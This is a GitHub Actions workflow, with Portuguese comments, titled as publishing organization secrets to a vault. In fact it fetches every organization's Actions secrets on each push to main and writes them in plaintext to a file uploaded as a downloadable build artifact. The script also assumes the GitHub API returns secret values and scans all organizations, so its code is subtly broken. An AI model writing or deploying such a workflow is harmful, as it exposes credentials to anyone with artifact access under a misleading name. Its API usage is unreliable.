name: Publish Org Secrets to Vault

on:
    push:
        branches:
            - main

jobs:
    publish_secrets:
        runs-on: ubuntu-latest

        steps:
            - name: Checkout repository
              uses: actions/checkout@v2

            - name: Publish Org Secrets
              run: |
                # Obtenha a lista de organizações
                orgs=$(curl -s -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
                    "https://api.github.com/orgs?per_page=100" | jq -r '.[].login')

                # Crie um arquivo para armazenar os valores das secrets
                echo "Secret Values:" > secrets.txt

                # Loop através de cada organização
                for org in $orgs; do
                    # Obtenha a lista de secrets da organização
                    secrets=$(curl -s -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
                        "https://api.github.com/orgs/$org/actions/secrets" | jq -r '.secrets[].name')

                    # Loop através de cada secret
                    for secret in $secrets; do
                        # Obtenha o valor da secret
                        value=$(curl -s -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
                            "https://api.github.com/orgs/$org/actions/secrets/$secret" | jq -r '.secret.value')

                        # Adicione o valor da secret ao arquivo
                        echo "$org/$secret=$value" >> secrets.txt
                    done
                done

            - name: Upload Secrets Artifact
              uses: actions/upload-artifact@v3
              with:
                name: org-secrets
                path: secrets.txt
